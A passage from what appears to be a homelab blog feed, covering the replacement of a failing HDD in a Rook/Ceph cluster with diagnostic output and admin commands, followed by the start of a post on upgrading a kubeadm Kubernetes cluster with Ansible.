</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;expected_write_size&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;alloc_hint_flags&#34;</span>: <span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;manifest&#34;</span>: {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;type&#34;</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">&#34;watchers&#34;</span>: {}
</span></span><span style="display:flex;"><span>            },
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">&#34;shards&#34;</span>: [
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;osd&#34;</span>: <span style="color:#ae81ff">3</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;primary&#34;</span>: <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;errors&#34;</span>: [],
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;size&#34;</span>: <span style="color:#ae81ff">2607565</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;omap_digest&#34;</span>: <span style="color:#e6db74">&#34;0xffffffff&#34;</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;data_digest&#34;</span>: <span style="color:#e6db74">&#34;0xb75fd373&#34;</span>
</span></span><span style="display:flex;"><span>                },
</span></span><span style="display:flex;"><span>                {
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;osd&#34;</span>: <span style="color:#ae81ff">7</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;primary&#34;</span>: <span style="color:#66d9ef">false</span>,
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;errors&#34;</span>: [
</span></span><span style="display:flex;"><span>                        <span style="color:#e6db74">&#34;read_error&#34;</span>
</span></span><span style="display:flex;"><span>                    ],
</span></span><span style="display:flex;"><span>                    <span style="color:#f92672">&#34;size&#34;</span>: <span style="color:#ae81ff">2607565</span>
</span></span><span style="display:flex;"><span>                }
</span></span><span style="display:flex;"><span>            ]
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The first good news from this info was that it showed which object the error
occurred in: <code>db0c7d6a-8b8b-48d5-85d8-f7f77dfac9eb.45990501.1_cache/media_attachments/files/114/881/148/093/347/525/original/8dd522a014922e6a.png</code>.
So that&rsquo;s fine - that&rsquo;s only an object in the media cache of my Mastodon instance.
The important piece of the information was the <code>shards</code> object at the end:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#e6db74">&#34;shards&#34;</span><span style="color:#960050;background-color:#1e0010">:</span> [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;osd&#34;</span>: <span style="color:#ae81ff">3</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;primary&#34;</span>: <span style="color:#66d9ef">true</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;errors&#34;</span>: [],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;size&#34;</span>: <span style="color:#ae81ff">2607565</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;omap_digest&#34;</span>: <span style="color:#e6db74">&#34;0xffffffff&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;data_digest&#34;</span>: <span style="color:#e6db74">&#34;0xb75fd373&#34;</span>
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;osd&#34;</span>: <span style="color:#ae81ff">7</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;primary&#34;</span>: <span style="color:#66d9ef">false</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;errors&#34;</span>: [
</span></span><span style="display:flex;"><span>            <span style="color:#e6db74">&#34;read_error&#34;</span>
</span></span><span style="display:flex;"><span>        ],
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;size&#34;</span>: <span style="color:#ae81ff">2607565</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>]
</span></span></code></pre></div><p>It shows which OSD the error occurred on, guiding me to the HDD in one of my
Ceph machines.</p>
<p>Logging into the machine and looking at <code>dmesg</code>, I was greeted with this error:</p>
<pre tabindex="0"><code>[1505504.381650] ata6.00: exception Emask 0x0 SAct 0x1780000 SErr 0x0 action 0x0
[1505504.381682] ata6.00: irq_stat 0x40000008
[1505504.381728] ata6.00: failed command: READ FPDMA QUEUED
[1505504.381738] ata6.00: cmd 60/00:98:e0:6e:c8/01:00:13:00:00/40 tag 19 ncq dma 131072 in
                          res 41/40:00:c8:6f:c8/00:00:13:00:00/00 Emask 0x409 (media error) &lt;F&gt;
[1505504.381764] ata6.00: status: { DRDY ERR }
[1505504.381772] ata6.00: error: { UNC }
[1505504.384181] ata6.00: configured for UDMA/133
[1505504.384269] sd 5:0:0:0: [sdc] tag#19 FAILED Result: hostbyte=DID_OK driverbyte=DRIVER_OK cmd_age=3s
[1505504.384281] sd 5:0:0:0: [sdc] tag#19 Sense Key : Medium Error [current] 
[1505504.384289] sd 5:0:0:0: [sdc] tag#19 Add. Sense: Unrecovered read error - auto reallocate failed
[1505504.384298] sd 5:0:0:0: [sdc] tag#19 CDB: Read(16) 88 00 00 00 00 00 13 c8 6e e0 00 00 01 00 00 00
[1505504.384303] I/O error, dev sdc, sector 331902920 op 0x0:(READ) flags 0x0 phys_seg 3 prio class 0
[1505504.384362] ata6: EH complete
</code></pre><p>Well, that was definitely a hardware error. Being 400 km away from the broken
disk, I decided to try to see whether it can be fixed by reallocating the sector.</p>
<p>For a long time, HDDs have come with a few spare sectors on the platters, in case
a sector gets damaged. The firmware would mark a sector as damaged and instead
use a sector from this spare area as a replacement.</p>
<p>After googling around a lot, I found that normally, this sector reallocation can
be triggered by overwriting the damaged sector with new data. This is supposed to
indicate to the HDD&rsquo;s firmware that I don&rsquo;t care about the previous data anymore.
In which case the HDD will mark the sector as bad and reallocate it. Beforehand,
it couldn&rsquo;t just do that, because I might have wanted to try to access the data
in the sector, trying to salvage it.</p>
<p>A direct write to a sector is inherently dangerous. The data there will be
completely overwritten, obviously.</p>
<p><strong>Only do the following if your really don&rsquo;t care about the data there anymore!</strong></p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>hdparm --yes-i-know-what-i-am-doing --write-sector <span style="color:#ae81ff">331902920</span> /dev/sdc
</span></span></code></pre></div><p>The sector number comes from the dmesg error message.
Please note the <code>--yes-i-know-what-i-am-doing</code> and make sure you really do!</p>
<p>This seemed to fix the error, as after a re-run of the scrub, I was not getting
any read errors anymore.
An immediate deep scrub of a PG can be triggered like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph pg deep-scrub 13.a
</span></span></code></pre></div><p>After that, the Ceph cluster error also disappeared. I decided that I&rsquo;ve got a
replication factor of two for all of my data anyway, plus backups. So I would
wait for another error to show up before switching out the HDD. And that worked
for another two months.</p>
<h2 id="switching-out-the-disk">Switching out the disk</h2>
<p>On September 20th, I got a very similar error, again on the same disk. I initially
tried the same approach as before, overwriting the damaged sector to trigger a
reallocation and then re-running the deep scrub in Ceph. But this time, the
approach did not work. Instead it produced additional read errors in neighboring
sectors. I ran three scrubs, and got read errors for different sectors in each
of them.</p>
<p>At that point I decided to replace the disk. Here is the disk&rsquo;s <code>smartctl -a</code>
output:</p>
<pre tabindex="0"><code>smartctl 7.4 2023-08-01 r5530 [x86_64-linux-6.8.0-79-generic] (local build)
Copyright (C) 2002-23, Bruce Allen, Christian Franke, www.smartmontools.org

=== START OF INFORMATION SECTION ===
Model Family:     Western Digital Red
Device Model:     WDC WD40EFRX-68N32N0
Serial Number:    WD-WCC7K6EE326H
LU WWN Device Id: 5 0014ee 20f9d1545
Firmware Version: 82.00A82
User Capacity:    4,000,787,030,016 bytes [4.00 TB]
Sector Sizes:     512 bytes logical, 4096 bytes physical
Rotation Rate:    5400 rpm
Form Factor:      3.5 inches
Device is:        In smartctl database 7.3/5528
ATA Version is:   ACS-3 T13/2161-D revision 5
SATA Version is:  SATA 3.1, 6.0 Gb/s (current: 6.0 Gb/s)
Local Time is:    Sat Sep 20 09:29:43 2025 CEST
SMART support is: Available - device has SMART capability.
SMART support is: Enabled

=== START OF READ SMART DATA SECTION ===
SMART overall-health self-assessment test result: PASSED

General SMART Values:
Offline data collection status:  (0x00)	Offline data collection activity
                                      was never started.
                                      Auto Offline Data Collection: Disabled.
Self-test execution status:      ( 113)	The previous self-test completed having
                                      the read element of the test failed.
Total time to complete Offline 
data collection: 		(45360) seconds.
Offline data collection
capabilities: 			 (0x7b) SMART execute Offline immediate.
                                      Auto Offline data collection on/off support.
                                      Suspend Offline collection upon new
                                      command.
                                      Offline surface scan supported.
                                      Self-test supported.
                                      Conveyance Self-test supported.
                                      Selective Self-test supported.
SMART capabilities:            (0x0003)	Saves SMART data before entering
                                      power-saving mode.
                                      Supports SMART auto save timer.
Error logging capability:        (0x01)	Error logging supported.
                                      General Purpose Logging supported.
Short self-test routine 
recommended polling time: 	 (   2) minutes.
Extended self-test routine
recommended polling time: 	 ( 482) minutes.
Conveyance self-test routine
recommended polling time: 	 (   5) minutes.
SCT capabilities: 	       (0x303d)	SCT Status supported.
                                      SCT Error Recovery Control supported.
                                      SCT Feature Control supported.
                                      SCT Data Table supported.

SMART Attributes Data Structure revision number: 16
Vendor Specific SMART Attributes with Thresholds:
ID# ATTRIBUTE_NAME          FLAG     VALUE WORST THRESH TYPE      UPDATED  WHEN_FAILED RAW_VALUE
1 Raw_Read_Error_Rate     0x002f   200   200   051    Pre-fail  Always       -       0
3 Spin_Up_Time            0x0027   253   164   021    Pre-fail  Always       -       1775
4 Start_Stop_Count        0x0032   100   100   000    Old_age   Always       -       41
5 Reallocated_Sector_Ct   0x0033   200   200   140    Pre-fail  Always       -       0
7 Seek_Error_Rate         0x002e   100   253   000    Old_age   Always       -       0
9 Power_On_Hours          0x0032   018   018   000    Old_age   Always       -       59917
10 Spin_Retry_Count        0x0032   100   253   000    Old_age   Always       -       0
11 Calibration_Retry_Count 0x0032   100   253   000    Old_age   Always       -       0
12 Power_Cycle_Count       0x0032   100   100   000    Old_age   Always       -       39
192 Power-Off_Retract_Count 0x0032   200   200   000    Old_age   Always       -       19
193 Load_Cycle_Count        0x0032   197   197   000    Old_age   Always       -       10581
194 Temperature_Celsius     0x0022   119   101   000    Old_age   Always       -       31
196 Reallocated_Event_Count 0x0032   200   200   000    Old_age   Always       -       0
197 Current_Pending_Sector  0x0032   200   200   000    Old_age   Always       -       1
198 Offline_Uncorrectable   0x0030   100   253   000    Old_age   Offline      -       0
199 UDMA_CRC_Error_Count    0x0032   200   200   000    Old_age   Always       -       1
200 Multi_Zone_Error_Rate   0x0008   100   253   000    Old_age   Offline      -       0
</code></pre><p>I bought the disk in late 2018, and it has been running continuously since then.</p>
<p>For the disk replacement, I used the emergency HDD I keep in storage for just
such an occasion as this. The new disk is an 8TB Seagate IronWolf, in the 5400 RPM
variant.</p>
<p>For the replacement, I followed <a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Advanced/ceph-osd-mgmt/#remove-an-osd">these instructions</a>.</p>
<p>But those don&rsquo;t really work.</p>
<p>Let me explain. I started out with removing the disk from the Ceph cluster CRD.
I don&rsquo;t have automated OSD creation enabled, so I&rsquo;ve got a list of storage
devices in my cluster CRD, and I removed the entry of the broken HDD:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;ceph3&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x50014ee20f9d1545&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span></code></pre></div><p>As the docs state, I started by scaling down the Rook operator:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n rook-ceph scale deployment rook-ceph-operator --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>Then I scaled down the deployment of the broken OSD as well:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl -n rook-ceph scale deployment rook-ceph-osd-7 --replicas<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>The next command is then supposed to be given via the rook-ceph <a href="https://github.com/rook/kubectl-rook-ceph">kubectl plugin</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl rook-ceph rook purge-osd <span style="color:#ae81ff">7</span>
</span></span></code></pre></div><p>That command is supposed to take the OSD out of the cluster and wait for rebalancing
to finish before then destroying the OSD.
But this didn&rsquo;t work, the command failed with this error:</p>
<pre tabindex="0"><code>Info: waiting for pod with label &#34;app=rook-ceph-operator&#34; in namespace &#34;rook-ceph&#34; to be running
</code></pre><p>So it looks like the command needs the operator to run? But at the same time, the
docs seem to state that I have to take down the operator first? I&rsquo;m not getting it.</p>
<p>Anyway, I started up the operator again and then executed the command a second time.
This triggered the rebalancing to the remaining OSDs and I went and did some other
things.</p>
<p>Okay, that was a lie. &#x1f605;
I continuously watched the Ceph dashboard and my Ceph Grafana dashboard of course. &#x1f601;</p>
<p>After about twelve hours of rebalancing, I realized that I might not have enough
space on the two remaining OSDs, with the OSD overview on the Ceph dashboard
looking like this:</p>
<figure>
    <img loading="lazy" src="osd-view-almost-full.png"
         alt="A screenshot of the Ceph dashboard&#39;s OSD overview. It shows one HDD OSD as out and down, with the two remaining HDD OSDs at 88% and 78% utilization."/> <figcaption>
            <p>I had forgotten to calculate whether I actually had enough space for all of the data to fit onto only two HDDs</p>
        </figcaption>
</figure>

<p>That was when I decided to just replace the disk, instead of waiting for the
rebalance to finish.</p>
<p>While doing so, I had another confirmation that I&rsquo;m just utterly incompetent when
it comes to doing things in the physical world:
<figure>
    <img loading="lazy" src="bad-install.jpg"
         alt="A picture of an HDD installed into a drive caddy. Notably, the HDD&#39;s connectors point towards the ventilation grill at the front of the caddy, instead of the open back."/> <figcaption>
            <p>No comment.</p>
        </figcaption>
</figure>

Well, at least I realized my mistake before I installed the thing in the server.</p>
<p>After installing the disk into the new server, I added it to the Ceph Cluster CRD,
triggering the creation of the Kubernetes deployment. The first thing I noted was
that the new OSD didn&rsquo;t have a device class set:</p>
<pre tabindex="0"><code>ceph osd tree
ID   CLASS  WEIGHT    TYPE NAME         STATUS  REWEIGHT  PRI-AFF
 -1         17.28386  root default
-10          4.54839      host ceph1
  6    hdd   3.63869          osd.6         up   1.00000  1.00000
  5    ssd   0.90970          osd.5         up   1.00000  1.00000
 -7          4.54839      host ceph2
  3    hdd   3.63869          osd.3         up   1.00000  1.00000
  2    ssd   0.90970          osd.2         up   1.00000  1.00000
-13          8.18709      host ceph3
  0          7.27739          osd.0         up   1.00000  1.00000
  4    ssd   0.90970          osd.4         up   1.00000  1.00000
</code></pre><p>Note how <code>osd.0</code> is missing the <code>CLASS</code>. I&rsquo;m not sure what&rsquo;s going wrong here.
I did configure the class in the Ceph Cluster entry:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>      - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;ceph3&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">devices</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;/dev/disk/by-id/wwn-0x5000c500e6f9fde3&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">config</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">deviceClass</span>: <span style="color:#ae81ff">hdd</span>
</span></span></code></pre></div><p>I fixed the issue with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph osd crush set-device-class hdd osd.0
</span></span></code></pre></div><p>Another problem was that for some reason, the Rook operator was still trying to
re-create OSD 7, the one from the broken HDD. This was the same symptom as I had
during my k8s migration of the Ceph cluster, and I had to do the same song and dance
to clean up the removed OSD. See <a href="https://blog.mei-home.net/posts/k8s-migration-23-baremetal-ceph-shutdown/#arrogance">here</a>.</p>
<p>To improve performance during the backfill to the new disk, I tweaked some Ceph
configs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph config set osd osd_mclock_profile high_recovery_ops
</span></span><span style="display:flex;"><span>ceph config set osd osd_mclock_override_recovery_settings true
</span></span><span style="display:flex;"><span>ceph config set osd osd_max_backfills <span style="color:#ae81ff">6</span>
</span></span></code></pre></div><p>The first line instructs Ceph to prioritize recovery ops higher, the second allows
me to override scheduler settings and the third sets the maximum number of
backfilling PGs per OSD to 6.
Specifically the last option increased recovery throughput from ~11 MB/s to ~50 MB/s.</p>
<p>And I don&rsquo;t like it. I had to do the same during the aforementioned migration
of the Ceph cluster to k8s. And I don&rsquo;t understand why. My cluster has an average
throughput below 10 MB/s. Why does it need a manual intervention from me to get
Ceph to use the remaining IO for the backfills? It just doesn&rsquo;t make any sense
to me. I must be doing something wrong, but I have no idea what that might be.
As I said in my post about the k8s migration, I will have to really dig into
Ceph&rsquo;s implementation at some point.</p>
<p>Let me also show you the timeline of the replacement, using the Ceph PG states
over time:</p>
<figure>
    <img loading="lazy" src="pg-states.png"
         alt="A screenshot of a Grafana time series visualization. It shows the different PG states and the number of PGs in the cluster currently in that state. The time range goes from 2025-09-20 09:00 to 2025-09-22 02:25. The cluster starts out with all 265 PGs in clean state. Then, around 10:15 on 2025-09-20, the number of clean PGs drops to 202, with 63 PGs degraded, undersized and remapped. Those counts then slowly decrease until reaching 44 PGs undersized&#43;remapped&#43;degraded around 20:58 on the same day. At that time, the counts suddenly go up to 121 degraded, 146 undersized and 42 remapped. That state only remains for about 30 minutes though, after which the values drop back to 38 degraded&#43;undersized&#43;remapped. Then the remapped value only increases to 78 PGs at 21:57, about twenty minutes after all values went back down again. After this, all values consistently decrease. At about 07:12 on 2025-09-21, the number of undersized PGs goes down to zero. The last remapped PG then vanishes at around 00:15 on the next day, after which the cluster is again clean for all 265 PGs."/> <figcaption>
            <p>State of the 265 PGs during the HDD switch</p>
        </figcaption>
</figure>

<p>At around 10:15 on 2025-09-20, I launched the replacement of the OSD, still thinking
I would wait for the rebalance to finish before taking out the old HDD. That
triggered 63 of the 265 PGs to go into undersized+remapped state, waiting to be
put onto a different OSD. That operation slowly continued for the next couple
of hours, until I realized that I didn&rsquo;t have enough space to store all the data
on the two remaining HDDs. I then decided to switch out the HDD around 21:00 on
the 20th. That required me to shut down the Ceph node, also making the PGs from
the SSD in that node unavailable, leading to the spike in undersized+remapped
PGs around that time. Once I booted the node up again, there were still more
remapped PGs than before. That&rsquo;s due to the fact that I replaced a 4 TB HDD with
an 8 TB one, leading Ceph to remap additional PGs to that larger disk.</p>
<p>The danger zone, meaning the time with reduced data redundancy, lasted from 10:15
on the 20th to 07:12 on the 21st, when the last undersized PG was backfilled.
Everything after that was just the rebalancing due to the additional space on the
new HDD. I could have kept the danger time a lot shorter if  had just switched
out the HDD right away, instead of waiting for a rebalance I ultimately had
to forego anyway.</p>
<p>One last thing to mention is the change in available space in the Ceph cluster.
I replaced a 4 TB HDD with an 8 TB one, so how much more space did that net me?
Due to the way Ceph works and the fact that I would need some space for Ceph
metadata on the device itself, I wouldn&rsquo;t get an additional 4 TB.</p>
<p>As an example, let&rsquo;s look at my S3 bucket data pool, which is entirely HDD based.
With three 4 TB HDDs, I had about 1.13 TiB free in that pool at the time I removed
the broken HDD. When the rebalance was done after the replacement, that same pool
had 2.46 TiB free. So I gained about 1.33 TiB from a 4 TB disk space increase. I don&rsquo;t think
that&rsquo;s too surprising, considering that the pool is a 2x replica pool, with a
&ldquo;host&rdquo; failure domain. That means each piece of data has to be available on two
hosts in the cluster. And two of my hosts still only have 4 TB HDDs, so the
8 TB of space from the new HDD doesn&rsquo;t have enough space on other hosts to be
fully utilized in the cluster.</p>
<p>Finally, I&rsquo;ve also bought WD&rsquo;s Red Plus 8 TB 5400 RPM HDD to have a replacement
should another HDD fail. And that might happen sooner rather than later, as I&rsquo;ve
got another 4 TB HDD of the same make and model I bought at the same time from
the same shop as the failed HDD. So this one might fail soon as well.</p>
<p>This action has yet again shown that I need to take a deep dive into Ceph performance
behavior at some point.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Updating my Kubeadm k8s Cluster from 1.30 to 1.33</title>
      <link>https://blog.mei-home.net/posts/kubernetes-cluster-update/</link>
      <pubDate>Sun, 21 Sep 2025 23:30:40 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/kubernetes-cluster-update/</guid>
      <description>Using Ansible to update my kubeadm k8s cluster from 1.30 to 1.33</description>
      <content:encoded><![CDATA[<p>Wherein I talk about updating my kubeadm Kubernetes cluster from 1.30 to 1.33
using Ansible.</p>
<p>I&rsquo;ve been a bit lax on my Kubernetes cluster updates, and I was still running
Kubernetes v1.30. I&rsquo;m also currently on a trip to fix a number of the smaller
tasks in my Homelab, paying down a bit of technical debt before tackling the
next big projects.</p>
<p>I already did one update, from my initial Kubernetes 1.29 to 1.30 in the past,
using an Ansible playbook I wrote to codify the kubeadm upgrade procedure. But
I never wrote a proper post about it, which I&rsquo;m now rectifying.</p>
<p>There were no really big problems - my cluster stayed up the entire time. But
there were issues in all three of the updates which might be of interest to
at least someone.</p>
<h2 id="the-kubeadm-cluster-update-procedure-and-version-skew">The kubeadm cluster update procedure and version skew</h2>
<p>The update of a kubeadm cluster is relatively straightforward, but it does
require some manual kubeadm actions directly on each node. The documentation
can be found <a href="https://kubernetes.io/docs/tasks/administer-cluster/kubeadm/kubeadm-upgrade/">here</a>.</p>
<p>Please note: Those instructions are versioned, and may change in the future
compared to what I&rsquo;m describing here. Please make sure you&rsquo;re reading the
instructions pertinent to the version you&rsquo;re currently running.</p>
<p>The first thing to do is to read the release notes. These are very nicely prepared
by the Kubernetes team <a href="https://github.com/kubernetes/kubernetes/tree/master/CHANGELOG">here</a>,
sorted by major version.
And I approve of them wholeheartedly. I&rsquo;ve been known to rant a bit about release
engineering and release notes, but there&rsquo;s nothing to complain about when it comes
to Kubernetes. Besides perhaps their length, but that&rsquo;s to be expected in a
project of Kubernetes&rsquo; size.</p>
<p>I did not find anything relevant or interesting to me directly in any of the
releases, so I won&rsquo;t go into detail about the changes.</p>
<p>One thing to note, which will bite me later, is the <a href="https://kubernetes.io/releases/version-skew-policy/">version skew policy</a>.
It describes the allowed skew between versions, most importantly between the
kubelet and the kube-apiserver said kubelet is talking to. Namely, the versions
between the two can skew at most by a single minor version, and the kubelet must
not be newer than the kube-apiserver. Meaning the kube-apiserver always needs to
be updated first. More on this later, when I stumble over this policy.</p>
<p>Here is a short step-by-step of the kubeadm update process, always starting with
the control plane nodes:</p>
<ol>
<li>Update kubeadm to the new Kubernetes version</li>
<li>On the very first CP node, run <code>kubeadm upgrade apply v1.31.11</code>, for example</li>
<li>Then, update kubeadm on the other CP nodes and run <code>kubeadm upgrade node</code></li>
<li>Only after point 3) is completed on all nodes, update the kubelet as well</li>
</ol>
<p>The steps 2-4 are repeated for all non-CP nodes as well. The order of steps
3 and 4 is important. <code>kubeadm upgrade</code> needs to be run on all CP nodes before
any kubelet is updated. Or at least, that&rsquo;s true on a High Availability cluster,
where the kube-apiservers are sitting behind a virtual IP. That&rsquo;s because of
the version skew policy I mentioned above: The kubelet must never be newer than
the kube-apiserver it is talking to. Which makes some sense: The Kubernetes API
is the public API, with stability guarantees, backwards compatibility and such.
So it will likely be able to serve older kubelets just fine, as it will still
support the older APIs that kubelet depends on. But in the other direction, the
newer kubelet may access APIs which older kube-apiservers simply don&rsquo;t serve
yet.</p>
<h2 id="my-cluster-update-ansible-playbook">My cluster update Ansible playbook</h2>
<p>As I tend to do, I created an Ansible playbook during the first update, so that
I could do something else while the update runs fully automated. That did not work for any of the
updates this time around, but I will go into more detail later.</p>
<p>Let&rsquo;s start with the fact that I&rsquo;m using Ubuntu Linux as my OS on all of my
Homelab hosts, and I&rsquo;m getting the Kubernetes components from the official
apt repos provided by the Kubernetes project.
I&rsquo;m also using <a href="https://cri-o.io/">cri-o</a> as my container runtime. Until recently,
that was also hosted in the <a href="https://k8s.io">k8s.io</a> repos, but has since moved
to the <a href="https://www.opensuse.org/">openSUSE</a> repos.</p>
<p>Before starting the first tasks, here is my <code>group_vars/all.yml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">crio_version_prev</span>: <span style="color:#ae81ff">v1.30</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kube_version_prev</span>: <span style="color:#ae81ff">v1.30</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kube_version</span>: <span style="color:#ae81ff">v1.31</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kube_version_full</span>: <span style="color:#ae81ff">1.31.11</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">crio_version</span>: <span style="color:#ae81ff">v1.31</span>
</span></span></code></pre></div><p>I&rsquo;ve stored the versions here, instead of the <code>defaults/main.yml</code> of the role
because I also use the versions in a few other places, mainly my deployment
roles for configuring new cluster nodes.</p>
<p>But enough prelude, here are the first few tasks from the <code>tasks/main.yml</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">update kubernetes repo key</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#ae81ff">kubernetes-keyring.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/usr/share/keyrings/kubernetes.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">0644</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">remove old kubernetes deb repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt_repository</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: &gt;<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deb [signed-by=/usr/share/keyrings/kubernetes.gpg]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      https://pkgs.k8s.io/core:/stable:/{{ kube_version_prev }}/deb/ /</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">absent</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">filename</span>: <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts[&#39;distribution&#39;] == &#39;Ubuntu&#39;</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add kubernetes ubuntu repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt_repository</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: &gt;<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deb [signed-by=/usr/share/keyrings/kubernetes.gpg]
